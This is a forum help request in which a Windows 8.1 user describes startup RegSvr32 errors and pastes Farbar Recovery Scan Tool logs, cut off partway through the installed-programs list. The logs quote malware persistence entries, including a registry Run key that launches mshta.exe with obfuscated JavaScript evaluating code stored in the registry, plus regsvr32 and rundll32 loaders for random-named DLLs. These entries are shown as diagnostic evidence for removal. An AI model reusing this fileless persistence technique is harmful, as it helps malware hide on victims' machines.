Hi
Recently my antivirus started blocking some infected files, which I subsequently deleted. Then I started receiving the RegSvr32 message upon startup.
I receive two of these errors
"C:\Users\Melinda\AppData\Local\lpl...\tvpgojdx.dll"
"C:\Users\Melinda\AppData\Local\Ek...\mpzrowjb.dll"
A window also pops up that says
Windows cannot find 'C:\Users\Melinda\AppData\Roaming\47ddd\fd6b5.65f2aa'. Make sure you typed the name correctly, and then try again.
I thought a system restore to factory setting would solve the problem, but it didn't.
Please help!
Please see below my FRST.txt and Addition.txt logs
Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version: 02-07-2016
Ran by Melinda (administrator) on MEL (06-07-2016 09:07:15)
Running from C:\Users\Melinda\Desktop
Loaded Profiles: Melinda (Available Profiles: Melinda & Administrator)
Platform: Windows 8.1 Single Language (Update) (X64) Language: English (United States)
Internet Explorer Version 11 (Default browser: IE)
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo...very-scan-tool/
==================== Processes (Whitelisted) =================
(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)
(Intel Corporation) C:\Windows\System32\igfxCUIService.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RtkAudioService64.exe
(Microsoft Corporation) C:\Windows\System32\wlanext.exe
(Andrea Electronics Corporation) C:\Program Files\Realtek\Audio\HDA\AERTSr64.exe
(Broadcom Corporation.) C:\Program Files\WIDCOMM\Bluetooth Software\btwdins.exe
(Intel® Corporation) C:\Program Files\Intel\iCLS Client\HeciServer.exe
(Microsoft Corporation) C:\Windows\Microsoft.NET\Framework64\v3.0\WPF\PresentationFontCache.exe
(McAfee, Inc.) C:\Program Files\mcafee\msc\McA2BB0.tmp
(Microsoft) C:\Program Files (x86)\Dell Customer Connect\OTBSurvey.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel® Management Engine Components\DAL\jhi_service.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel® Management Engine Components\LMS\LMS.exe
() C:\Program Files\Dell\My Dell Learning Center\MDLCSvc.exe
(CyberLink) C:\Program Files (x86)\CyberLink\Shared files\RichVideo.exe
(SoftThinks SAS) C:\Program Files (x86)\Dell Backup and Recovery\sftservice.exe
(Microsoft Corporation) C:\Windows\System32\LogonUI.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPEnh.exe
(Intel Corporation) C:\Windows\System32\igfxEM.exe
(Intel Corporation) C:\Windows\System32\igfxHK.exe
(Intel Corporation) C:\Windows\System32\igfxTray.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPHelper.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe
(Waves Audio Ltd.) C:\Program Files\Realtek\Audio\HDA\WavesSvc64.exe
(Dell Inc.) C:\Program Files\Dell\QuickSet\quickset.exe
(Microsoft Corporation) C:\Windows\System32\rundll32.exe
(Microsoft Corporation) C:\Windows\SysWOW64\regsvr32.exe
(Microsoft Corporation) C:\Windows\System32\regsvr32.exe
(Broadcom Corporation.) C:\Program Files\WIDCOMM\Bluetooth Software\BTTray.exe
(Microsoft Corporation) C:\Windows\System32\cmd.exe
() C:\Program Files (x86)\Dropbox\DropboxOEM\DropboxOEM.exe
(Broadcom Corporation.) C:\Program Files\WIDCOMM\Bluetooth Software\BTStackServer.exe
(CyberLink) C:\Program Files (x86)\CyberLink\Power2Go8\CLMLSvc_P2G8.exe
(Microsoft Corporation) C:\Program Files\Internet Explorer\iexplore.exe
(Dell Inc.) C:\Program Files (x86)\Dell Update\DellUpService.exe
(Microsoft Corporation) C:\Windows\SysWOW64\regsvr32.exe
(Microsoft Corporation) C:\Windows\SysWOW64\regsvr32.exe
(Microsoft Corporation) C:\Windows\SysWOW64\rundll32.exe
(Adobe Systems Incorporated) C:\Windows\System32\Macromed\Flash\FlashUtil_ActiveX.exe
(McAfee, Inc.) C:\Program Files\Common Files\mcafee\ActWiz\McAWFwk.exe
(Dell Products, LP.) C:\Program Files (x86)\Dell Digital Delivery\DeliveryService.exe
(SoftThinks - Dell) C:\Program Files (x86)\Dell Backup and Recovery\toaster.exe
(Microsoft Corporation) C:\Windows\SysWOW64\wbem\WmiPrvSE.exe
(SoftThinks - Dell) C:\Program Files (x86)\Dell Backup and Recovery\Components\Shell\dbrsync.exe
(Aviata Inc) C:\Program Files (x86)\Dell Product Registration\prodreg.exe
(McAfee, Inc.) C:\Program Files\Common Files\mcafee\ModuleCore\ModuleCoreService.exe
(McAfee, Inc.) C:\Program Files\Common Files\mcafee\CSP\1.9.741.0\McCSPServiceHost.exe
(Intel Security, Inc.) C:\Program Files\Common Files\Intel Security\PEF\CORE\PEFService.exe
(McAfee, Inc.) C:\Program Files\Common Files\mcafee\systemcore\mfemms.exe
(McAfee, Inc.) C:\Windows\System32\mfevtps.exe
(McAfee, Inc.) C:\Windows\System32\mfevtps.exe
(McAfee, Inc.) C:\Program Files\Common Files\mcafee\systemcore\mfefire.exe
(McAfee, Inc.) C:\Program Files\Common Files\mcafee\systemcore\mfefire.exe
(McAfee, Inc.) C:\Program Files\Common Files\mcafee\platform\McSvcHost\McSvHost.exe
(McAfee, Inc.) C:\Program Files\Common Files\mcafee\AMCore\mcshield.exe
(McAfee, Inc.) C:\Program Files\mcafee\vul\McVulCtr.exe
(McAfee, Inc.) C:\Program Files\Common Files\mcafee\platform\McUICnt.exe
(Microsoft Corporation) C:\Windows\WinSxS\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_6.3.9600.17477_none_fa2b7d3b9b36c7b4\TiWorker.exe
(SoftThinks SAS) C:\Program Files (x86)\Dell Backup and Recovery\vssx64.exe
(Microsoft Corporation) C:\Windows\System32\msiexec.exe
(Dell) C:\Program Files\Dell\Dell Foundation Services\DFSSvc.exe
(Dell) C:\Program Files\Dell\Dell Foundation Services\DFS.Common.Agent.exe
==================== Registry (Whitelisted) ===========================
(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)
HKLM\...\Run: [RTHDVCPL] => C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe [7637208 2014-07-09] (Realtek Semiconductor)
HKLM\...\Run: [RtHDVBg] => C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe [1387736 2014-07-05] (Realtek Semiconductor)
HKLM\...\Run: [WavesSvc] => C:\Program Files\Realtek\Audio\HDA\WavesSvc64.exe [562264 2014-04-10] (Waves Audio Ltd.)
HKLM\...\Run: [QuickSet] => c:\Program Files\Dell\QuickSet\QuickSet.exe [3777696 2014-01-17] (Dell Inc.)
HKLM-x32\...\Run: [DropboxOEM] => C:\Program Files (x86)\Dropbox\DropboxOEM\DropboxOEM.exe [462160 2014-09-02] ()
HKU\S-1-5-21-3305678368-1645044794-3837945535-1001\...\Run: [Microsoft system protection service] => rundll32.exe "C:\Users\Melinda\AppData\Local\Microsoft\Protect\protecthost.dll",DllInstall
HKU\S-1-5-21-3305678368-1645044794-3837945535-1001\...\Run: [**ucabwqcmu<*>] => "C:\Windows\system32\mshta.exe" javascript:UijM5="a9Z";s0c=new%20ActiveXObject("WScript.Shell");tgg8jMFW4="M7agQqde";nHzc77=s0c.RegRead("HKCU\\software\\fokfinshfo\\kblbsn");a43CaBx="1qdI";eval(nHzc77 (the data entry has 12 more characters). <===== ATTENTION (Value Name with invalid characters)
HKU\S-1-5-21-3305678368-1645044794-3837945535-1001\...\Run: [**niawqwmeni<*>] => "C:\Users\Melinda\AppData\Local\d6ab6\e9597.lnk" <===== ATTENTION (Value Name with invalid characters)
HKU\S-1-5-21-3305678368-1645044794-3837945535-1001\...\Run: [Iplmsoft] => C:\Users\Melinda\AppData\Local\Iplmsoft\tmpDE80.exe
HKU\S-1-5-21-3305678368-1645044794-3837945535-1001\...\Run: [YjpwPack] => C:\Windows\SysWOW64\regsvr32.exe C:\Users\Melinda\AppData\Local\Iplmsoft\tvpgojdx.dll
HKU\S-1-5-21-3305678368-1645044794-3837945535-1001\...\Run: [Ekbrtion] => regsvr32.exe C:\Users\Melinda\AppData\Local\Ekbrtion\mpzrowjb.dll <===== ATTENTION
HKU\S-1-5-21-3305678368-1645044794-3837945535-1001\...\MountPoints2: {05ce7cd0-584f-11e5-825e-acd1b8d216c6} - "F:\AutoRun.exe"
HKU\S-1-5-21-3305678368-1645044794-3837945535-1001\...\MountPoints2: {05ce7df2-584f-11e5-825e-acd1b8d216c6} - "F:\AutoRun.exe"
ShellIconOverlayIdentifiers: [DBRShellOverlayBackupFile] -> {831CEBDD-6BAF-4432-BE76-9E0989C14AEF} => C:\Program Files (x86)\Dell Backup and Recovery\Components\Shell\DBROverlayIconBackuped.dll [2015-12-08] (SoftThinks SAS)
ShellIconOverlayIdentifiers: [DBRShellOverlayModifiedBackupFile] -> {275E4FD7-21EF-45CF-A836-832E5D2CC1B3} => C:\Program Files (x86)\Dell Backup and Recovery\Components\Shell\DBROverlayIconNotBackuped.dll [2015-12-08] (SoftThinks SAS)
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Bluetooth.lnk [2015-06-07]
ShortcutTarget: Bluetooth.lnk -> C:\Program Files\WIDCOMM\Bluetooth Software\BTTray.exe (Broadcom Corporation.)
Startup: C:\Users\Melinda\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\9630a.lnk [2016-07-06]
ShortcutTarget: 9630a.lnk -> C:\Windows\System32\cmd.exe (Microsoft Corporation)
Startup: C:\Users\Melinda\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f0f18.lnk [2016-06-30]
ShortcutTarget: f0f18.lnk -> C:\Windows\System32\cmd.exe (Microsoft Corporation)
==================== Internet (Whitelisted) ====================
(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)
Tcpip\Parameters: [DhcpNameServer] 192.168.43.1
Tcpip\..\Interfaces\{28CEFB91-FA63-4200-9B83-6978147A71A0}: [DhcpNameServer] 192.168.43.1
Tcpip\..\Interfaces\{812A2ED5-72C3-4457-9E4D-A562956307C8}: [DhcpNameServer] 192.168.0.1
Internet Explorer:
==================
HKU\S-1-5-21-3305678368-1645044794-3837945535-1001\Software\Microsoft\Internet Explorer\Main,Start Page = about:blank
SearchScopes: HKU\S-1-5-21-3305678368-1645044794-3837945535-1001 -> {15187E60-21FC-4B6A-AF68-DCB76EE1584B} URL =
Toolbar: HKU\S-1-5-21-3305678368-1645044794-3837945535-1001 -> No Name - {2318C2B1-4965-11D4-9B18-009027A5CD4F} - No File
Filter: application/x-mfe-ipt - {3EF5086B-5478-4598-A054-786C45D75692} - c:\Program Files\mcafee\msc\McSnIePl64.dll [2016-05-24] (McAfee, Inc.)
Filter-x32: application/x-mfe-ipt - {3EF5086B-5478-4598-A054-786C45D75692} - c:\Program Files (x86)\McAfee\msc\McSnIePl.dll [2016-05-24] (McAfee, Inc.)
FireFox:
========
FF Plugin: @mcafee.com/MSC,version=10 -> c:\PROGRA~1\mcafee\msc\NPMCSN~1.DLL [2016-05-24] ()
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI ipt;version=4.0.5 -> C:\Program Files (x86)\Intel\Intel® Management Engine Components\IPT\npIntelWebAPIIPT.dll [2013-12-10] (Intel Corporation)
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI updater -> C:\Program Files (x86)\Intel\Intel® Management Engine Components\IPT\npIntelWebAPIUpdater.dll [2013-12-10] (Intel Corporation)
FF Plugin-x32: @mcafee.com/MSC,version=10 -> c:\PROGRA~2\mcafee\msc\NPMCSN~1.DLL [2016-05-24] ()
FF Plugin HKU\S-1-5-21-3305678368-1645044794-3837945535-1001: @citrixonline.com/appdetectorplugin -> C:\Users\Melinda\AppData\Local\Citrix\Plugins\104\npappdetector.dll [No File]
==================== Services (Whitelisted) ========================
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
S2 0106601467779372mcinstcleanup; C:\Windows\TEMP\010660~1.EXE [962400 2016-04-12] (McAfee, Inc.)
S2 BcmBtRSupport; C:\Windows\system32\BtwRSupportService.exe [2251992 2015-06-07] (Broadcom Corporation.)
R2 Dell Customer Connect; C:\Program Files (x86)\Dell Customer Connect\OTBSurvey.exe [141704 2015-02-04] (Microsoft)
R2 Dell Foundation Services; C:\Program Files\Dell\Dell Foundation Services\DFSSvc.exe [119656 2016-01-15] (Dell)
S3 DellProdRegManager; C:\Program Files (x86)\Dell Product Registration\regmgrsvc.exe [293440 2014-04-01] (Aviata, Inc.)
R2 DellUpdate; C:\Program Files (x86)\Dell Update\DellUpService.exe [237272 2015-08-27] (Dell Inc.)
R2 HomeNetSvc; C:\Program Files\Common Files\McAfee\Platform\McSvcHost\McSvHost.exe [599864 2016-04-23] (McAfee, Inc.)
R2 igfxCUIService1.0.0.0; C:\Windows\system32\igfxCUIService.exe [318568 2014-10-01] (Intel Corporation)
R2 Intel® Capability Licensing Service Interface; c:\Program Files\Intel\iCLS Client\HeciServer.exe [747520 2013-08-27] (Intel® Corporation) [File not signed]
S3 Intel® Capability Licensing Service TCP IP Interface; c:\Program Files\Intel\iCLS Client\SocketHeciServer.exe [828376 2013-08-27] (Intel® Corporation)
R2 jhi_service; C:\Program Files (x86)\Intel\Intel® Management Engine Components\DAL\jhi_service.exe [169432 2013-12-10] (Intel Corporation)
R2 McAPExe; C:\Program Files\McAfee\MSC\McAPExe.exe [989192 2016-05-24] (McAfee, Inc.)
R3 McAWFwk; c:\Program Files\Common Files\mcafee\ActWiz\McAWFwk.exe [334608 2013-07-25] (McAfee, Inc.)
R2 McBootDelayStartSvc; C:\Program Files\Common Files\McAfee\Platform\McSvcHost\McSvHost.exe [599864 2016-04-23] (McAfee, Inc.)
R2 mccspsvc; C:\Program Files\Common Files\McAfee\CSP\1.9.741.0\\McCSPServiceHost.exe [1903320 2016-04-18] (McAfee, Inc.)
R2 McNaiAnn; C:\Program Files\Common Files\mcafee\platform\McSvcHost\McSvHost.exe [599864 2016-04-23] (McAfee, Inc.)
S3 McODS; C:\Program Files\mcafee\VirusScan\mcods.exe [795528 2016-04-20] (McAfee, Inc.)
S2 McOobeSv2; C:\Program Files\Common Files\mcafee\platform\McSvcHost\McSvHost.exe [599864 2016-04-23] (McAfee, Inc.)
R2 mcpltsvc; C:\Program Files\Common Files\mcafee\platform\McSvcHost\McSvHost.exe [599864 2016-04-23] (McAfee, Inc.)
R2 McProxy; C:\Program Files\Common Files\mcafee\platform\McSvcHost\McSvHost.exe [599864 2016-04-23] (McAfee, Inc.)
R2 mfefire; C:\Program Files\Common Files\McAfee\SystemCore\\mfefire.exe [232688 2016-03-07] (McAfee, Inc.)
R2 mfemms; C:\Program Files\Common Files\McAfee\SystemCore\\mfemms.exe [382456 2016-04-01] (McAfee, Inc.)
R2 mfevtp; C:\Windows\system32\mfevtps.exe [277744 2016-03-07] (McAfee, Inc.)
R2 ModuleCoreService; C:\Program Files\Common Files\McAfee\ModuleCore\ModuleCoreService.exe [1424352 2016-04-21] (McAfee, Inc.)
R2 My Dell Learning Center; C:\Program Files\Dell\My Dell Learning Center\MDLCSvc.exe [22528 2015-01-22] () [File not signed]
R2 PEFService; C:\Program Files\Common Files\Intel Security\PEF\CORE\PEFService.exe [1029856 2016-04-21] (Intel Security, Inc.)
R2 RichVideo; C:\Program Files (x86)\CyberLink\Shared files\RichVideo.exe [253776 2013-07-30] (CyberLink)
R2 RtkAudioService; C:\Program Files\Realtek\Audio\HDA\RtkAudioService64.exe [290520 2014-01-08] (Realtek Semiconductor)
R2 SftService; C:\Program Files (x86)\Dell Backup and Recovery\SftService.exe [2065808 2016-01-04] (SoftThinks SAS)
S3 WdNisSvc; C:\Program Files\Windows Defender\NisSrv.exe [368632 2015-06-07] (Microsoft Corporation)
S3 WinDefend; C:\Program Files\Windows Defender\MsMpEng.exe [23792 2015-06-07] (Microsoft Corporation)
===================== Drivers (Whitelisted) ==========================
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
R3 bcbtums; C:\Windows\system32\drivers\bcbtums.sys [170712 2015-06-07] (Broadcom Corporation.)
R3 BCM43XX; C:\Windows\system32\DRIVERS\bcmwl63a.sys [7569112 2015-06-07] (Broadcom Corporation)
S3 cfwids; C:\Windows\System32\drivers\cfwids.sys [78632 2016-03-11] (McAfee, Inc.)
R1 CLVirtualDrive; C:\Windows\system32\DRIVERS\CLVirtualDrive.sys [91712 2013-03-05] (CyberLink)
R3 DellRbtn; C:\Windows\System32\drivers\DellRbtn.sys [10752 2013-01-25] (OSR Open Systems Resources, Inc.)
S0 ebdrv; C:\Windows\System32\drivers\evbda.sys [3357024 2013-08-22] (Broadcom Corporation)
R3 MEIx64; C:\Windows\System32\drivers\TeeDriverx64.sys [100312 2013-12-10] (Intel Corporation)
R3 mfeaack; C:\Windows\System32\drivers\mfeaack.sys [419624 2016-03-11] (McAfee, Inc.)
R3 mfeavfk; C:\Windows\System32\drivers\mfeavfk.sys [349480 2016-03-11] (McAfee, Inc.)
U3 mfeavfk01; no ImagePath
S0 mfeelamk; C:\Windows\System32\drivers\mfeelamk.sys [83608 2016-03-11] (McAfee, Inc.)
R3 mfefirek; C:\Windows\System32\drivers\mfefirek.sys [493352 2016-03-11] (McAfee, Inc.)
R0 mfehidk; C:\Windows\System32\drivers\mfehidk.sys [842536 2016-03-11] (McAfee, Inc.)
U3 mfehidk01; no ImagePath
R3 mfencbdc; C:\Windows\System32\DRIVERS\mfencbdc.sys [543488 2016-02-10] (McAfee, Inc.)
U3 mfencbdc01; no ImagePath
U3 mfencbdc02; no ImagePath
S3 mfencrk; C:\Windows\System32\DRIVERS\mfencrk.sys [109480 2016-02-10] (McAfee, Inc.)
R0 mfewfpk; C:\Windows\System32\drivers\mfewfpk.sys [243496 2016-03-11] (McAfee, Inc.)
R3 SynRMIHID; C:\Windows\system32\DRIVERS\SynRMIHID.sys [42664 2015-01-10] (Synaptics Incorporated)
S3 WdBoot; C:\Windows\system32\drivers\WdBoot.sys [35320 2015-06-07] (Microsoft Corporation)
S3 WdFilter; C:\Windows\system32\drivers\WdFilter.sys [258368 2015-06-07] (Microsoft Corporation)
S3 WdNisDrv; C:\Windows\System32\Drivers\WdNisDrv.sys [114496 2015-06-07] (Microsoft Corporation)
S0 mfeapfk; system32\drivers\mfeapfk.sys [X]
==================== NetSvcs (Whitelisted) ===================
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
==================== One Month Created files and folders ========
(If an entry is included in the fixlist, the file/folder will be moved.)
2016-07-06 09:07 - 2016-07-06 09:08 - 00016725 _____ C:\Users\Melinda\Desktop\FRST.txt
2016-07-06 09:06 - 2016-07-06 09:07 - 00000000 ____D C:\FRST
2016-07-06 09:04 - 2016-07-06 09:05 - 02390016 _____ (Farbar) C:\Users\Melinda\Desktop\FRST64.exe
2016-07-06 08:20 - 2016-07-06 08:20 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\McAfee
2016-07-06 08:14 - 2016-07-06 08:14 - 00003068 _____ C:\Windows\System32\Tasks\McAfeeLogon
2016-07-06 08:14 - 2016-07-06 08:14 - 00000000 ____D C:\Windows\System32\Tasks\McAfee
2016-07-06 08:13 - 2016-07-06 08:13 - 00000000 ____D C:\ProgramData\Intel Security
2016-07-06 08:12 - 2016-07-06 08:12 - 00000000 ____D C:\Program Files\Common Files\Intel Security
2016-07-06 08:07 - 2016-07-06 08:07 - 00003440 _____ C:\Windows\System32\Tasks\UninstallDDS-C960901F-CE14-4DE1-9729-1305F719A337
2016-07-06 07:58 - 2016-07-06 08:58 - 00003348 _____ C:\Windows\System32\Tasks\McAfee Remediation (Prepare)
2016-07-06 07:58 - 2016-07-06 07:58 - 00000000 ____D C:\Program Files\Common Files\AV
2016-07-06 07:57 - 2016-07-06 08:46 - 00003600 _____ C:\Windows\System32\Tasks\Optimize Start Menu Cache Files-S-1-5-21-3305678368-1645044794-3837945535-1001
2016-07-06 07:55 - 2016-07-06 07:55 - 00000000 ____D C:\Program Files (x86)\Dell Digital Delivery
2016-07-06 07:54 - 2016-07-06 07:54 - 00000000 ____D C:\Users\Melinda\AppData\Roaming\Macromedia
2016-07-06 07:53 - 2016-07-06 07:53 - 00000000 __SHD C:\Users\Melinda\AppData\Local\EmieUserList
2016-07-06 07:53 - 2016-07-06 07:53 - 00000000 __SHD C:\Users\Melinda\AppData\Local\EmieSiteList
2016-07-06 07:53 - 2016-07-06 07:53 - 00000000 __SHD C:\Users\Melinda\AppData\Local\EmieBrowserModeList
2016-07-06 07:53 - 2016-07-06 07:53 - 00000000 ____D C:\Users\Melinda\AppData\Roaming\8c2cb
2016-07-06 07:53 - 2016-07-06 07:53 - 00000000 ____D C:\Users\Melinda\AppData\Local\fcb0a
2016-07-06 07:52 - 2016-07-06 08:02 - 00000000 ____D C:\Users\Melinda\AppData\Roaming\DropboxOEM
2016-07-06 07:52 - 2016-07-06 07:52 - 00000000 ____D C:\Users\Melinda\AppData\Roaming\Adobe
2016-07-06 06:44 - 2016-07-06 06:44 - 00000000 ____D C:\Windows\System32\Tasks\WPD
2016-07-06 06:44 - 2016-07-06 06:44 - 00000000 ____D C:\Users\Melinda\Documents\Bluetooth Exchange Folder
2016-07-06 06:44 - 2016-07-06 06:44 - 00000000 ____D C:\Users\Melinda\AppData\Local\DropboxOEM
2016-07-06 06:44 - 2016-07-06 06:44 - 00000000 ____D C:\Users\Melinda\AppData\Local\Broadcom
2016-07-06 06:43 - 2016-07-06 06:43 - 00000000 ____D C:\Users\Melinda\AppData\Local\Aviata
2016-07-06 06:37 - 2016-01-07 01:04 - 00000107 ____H C:\DBAR_Ver.txt
2016-07-06 06:34 - 2016-07-06 06:34 - 00003980 _____ C:\Windows\System32\Tasks\PCDoctorBackgroundMonitorTask
2016-07-06 06:34 - 2016-07-06 06:34 - 00003440 _____ C:\Windows\System32\Tasks\PCDEventLauncherTask
2016-07-06 06:34 - 2016-07-06 06:34 - 00003190 _____ C:\Windows\System32\Tasks\SystemToolsDailyTest
2016-07-06 06:30 - 2016-07-06 06:30 - 00000000 ____D C:\Users\Melinda\AppData\Local\Power2Go8
2016-07-06 06:29 - 2016-07-06 06:29 - 00000144 _____ C:\Windows\system32\{A6D608F0-0BDE-491A-97AE-5C4B05D86E01}.bat
2016-07-06 06:29 - 2016-07-06 06:29 - 00000000 __SHD C:\Users\Melinda\IntelGraphicsProfiles
2016-07-06 06:28 - 2016-07-06 06:28 - 00000020 ___SH C:\Users\Melinda\ntuser.ini
2016-07-06 02:56 - 2016-07-06 06:37 - 00000000 ____D C:\ProgramData\softthinks
2016-07-06 02:46 - 2016-07-06 02:46 - 00000000 _SHDL C:\Users\Default\My Documents
2016-07-06 02:46 - 2016-07-06 02:46 - 00000000 _SHDL C:\Users\Default\Documents\My Videos
2016-07-06 02:46 - 2016-07-06 02:46 - 00000000 _SHDL C:\Users\Default\Documents\My Pictures
2016-07-06 02:46 - 2016-07-06 02:46 - 00000000 _SHDL C:\Users\Default\Documents\My Music
2016-07-06 02:46 - 2016-07-06 02:46 - 00000000 _SHDL C:\Users\Default User\Documents\My Videos
2016-07-06 02:46 - 2016-07-06 02:46 - 00000000 _SHDL C:\Users\Default User\Documents\My Pictures
2016-07-06 02:46 - 2016-07-06 02:46 - 00000000 _SHDL C:\Users\Default User\Documents\My Music
2016-07-05 19:48 - 2016-07-06 02:55 - 00000000 ____D C:\20160705194811_BACKUP
==================== One Month Modified files and folders ========
(If an entry is included in the fixlist, the file/folder will be moved.)
2016-07-06 09:06 - 2015-06-07 15:13 - 00000000 ___RD C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Dell
2016-07-06 09:06 - 2015-06-07 15:07 - 00000000 ____D C:\Program Files\Dell
2016-07-06 09:00 - 2015-06-07 15:19 - 00000000 ____D C:\Program Files (x86)\Dell Backup and Recovery
2016-07-06 09:00 - 2013-08-22 15:36 - 00000000 ____D C:\Windows\Inf
2016-07-06 08:59 - 2015-06-07 15:15 - 00000000 ____D C:\ProgramData\McAfee
2016-07-06 08:17 - 2015-06-07 15:15 - 00000000 ____D C:\Program Files\Common Files\mcafee
2016-07-06 08:16 - 2013-08-22 17:36 - 00000000 ___HD C:\Windows\ELAMBKUP
2016-07-06 08:16 - 2013-08-22 15:25 - 00262144 ___SH C:\Windows\system32\config\ELAM
2016-07-06 08:08 - 2015-06-07 17:10 - 00000000 ____D C:\ProgramData\Dell
2016-07-06 07:52 - 2015-06-07 15:15 - 00000000 ____D C:\Program Files (x86)\Dell Update
2016-07-06 07:51 - 2013-08-22 17:36 - 00000000 ____D C:\Windows\AppReadiness
2016-07-06 06:40 - 2013-08-22 17:36 - 00000000 ___HD C:\Program Files\WindowsApps
2016-07-06 06:34 - 2015-06-07 15:13 - 00000000 ____D C:\ProgramData\PCDr
2016-07-06 06:32 - 2014-11-21 06:42 - 00863592 _____ C:\Windows\system32\PerfStringBackup.INI
2016-07-06 06:29 - 2015-08-15 13:44 - 00000000 ____D C:\Users\Melinda
2016-07-06 06:28 - 2013-08-22 16:45 - 00000006 ____H C:\Windows\Tasks\SA.DAT
2016-07-06 02:50 - 2013-08-22 17:36 - 00000000 ____D C:\Windows\Web
2016-07-05 09:51 - 2015-08-15 13:44 - 00000000 ____D C:\Users\Melinda\AppData\Local\Packages
==================== Files in the root of some directories =======
2015-06-07 14:43 - 2015-06-07 14:43 - 0000000 ____H () C:\ProgramData\DP45977C.lfl
2015-06-07 15:02 - 2015-06-07 15:02 - 0000121 _____ () C:\ProgramData\{1FBF6C24-C1fD-4101-A42B-0C564F9E8E79}.log
2015-06-07 14:57 - 2015-06-07 14:58 - 0000106 _____ () C:\ProgramData\{2A87D48D-3FDF-41fd-97CD-A1E370EFFFE2}.log
2015-06-07 14:58 - 2015-06-07 15:00 - 0000111 _____ () C:\ProgramData\{B0B4F6D2-F2AE-451A-9496-6F2F6A897B32}.log
2015-06-07 15:00 - 2015-06-07 15:02 - 0000108 _____ () C:\ProgramData\{B46BEA36-0B71-4A4E-AE41-87241643FA0A}.log
2015-06-07 14:56 - 2015-06-07 14:57 - 0000107 _____ () C:\ProgramData\{C59C179C-668D-49A9-B6EA-0121CCFC1243}.log
==================== Bamital & volsnap =================
(There is no automatic fix for files that do not pass verification.)
C:\Windows\system32\winlogon.exe => File is digitally signed
C:\Windows\system32\wininit.exe => File is digitally signed
C:\Windows\explorer.exe => File is digitally signed
C:\Windows\SysWOW64\explorer.exe => File is digitally signed
C:\Windows\system32\svchost.exe => File is digitally signed
C:\Windows\SysWOW64\svchost.exe => File is digitally signed
C:\Windows\system32\services.exe => File is digitally signed
C:\Windows\system32\User32.dll => File is digitally signed
C:\Windows\SysWOW64\User32.dll => File is digitally signed
C:\Windows\system32\userinit.exe => File is digitally signed
C:\Windows\SysWOW64\userinit.exe => File is digitally signed
C:\Windows\system32\rpcss.dll => File is digitally signed
C:\Windows\system32\dnsapi.dll => File is digitally signed
C:\Windows\SysWOW64\dnsapi.dll => File is digitally signed
C:\Windows\system32\Drivers\volsnap.sys => File is digitally signed
LastRegBack: 2016-07-06 08:47
==================== End of FRST.txt ============================
Additional scan result of Farbar Recovery Scan Tool (x64) Version: 02-07-2016
Ran by Melinda (2016-07-06 09:08:23)
Running from C:\Users\Melinda\Desktop
Windows 8.1 Single Language (Update) (X64) (2015-06-07 13:37:40)
Boot Mode: Normal
==========================================================
==================== Accounts: =============================
Administrator (S-1-5-21-3305678368-1645044794-3837945535-500 - Administrator - Disabled) => C:\Users\Administrator
Guest (S-1-5-21-3305678368-1645044794-3837945535-501 - Limited - Disabled)
Melinda (S-1-5-21-3305678368-1645044794-3837945535-1001 - Administrator - Enabled) => C:\Users\Melinda
==================== Security Center ========================
(If an entry is included in the fixlist, it will be removed.)
AV: McAfee Anti-Virus and Anti-Spyware (Enabled - Up to date) {ADA629C7-7F48-5689-624A-3B76997E0892}
AV: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AV: McAfee Anti-Virus and Anti-Spyware (Enabled - Up to date) {DA9F8ED0-D0DE-39CC-F55A-51AB4CC1B556}
AS: McAfee Anti-Virus and Anti-Spyware (Enabled - Up to date) {16C7C823-5972-5907-58FA-0004E2F9422F}
AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: McAfee Anti-Virus and Anti-Spyware (Enabled - Up to date) {61FE6F34-F6E4-3642-CFEA-6AD93746FFEB}
==================== Installed Programs ======================
(Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)
Amazon 1Button App (HKLM-x32\...\{0A7D6F3C-F2AB-48ED-BE23-99791BFF87D6}) (Version: 1.0.0.4 - Amazon) <==== ATTENTION
Amazon Kindle (HKU\S-1-5-21-3305678368-1645044794-3837945535-1001\...\Amazon Kindle) (Version: - Amazon)
Cisco EAP-FAST Module (x32 Version: 2.2.14 - Cisco Systems, Inc.) Hidden
Cisco LEAP Module (x32 Version: 1.0.19 - Cisco Systems, Inc.) Hidden
Cisco PEAP Module (x32 Version: 1.1.6 - Cisco Systems, Inc.) Hidden
CyberLink Media Suite Essentials (HKLM-x32\...\InstallShield_{8F14AA37-5193-4A14-BD5B-BDF9B361AEF7}) (Version: 10.0 - CyberLink Corp.)
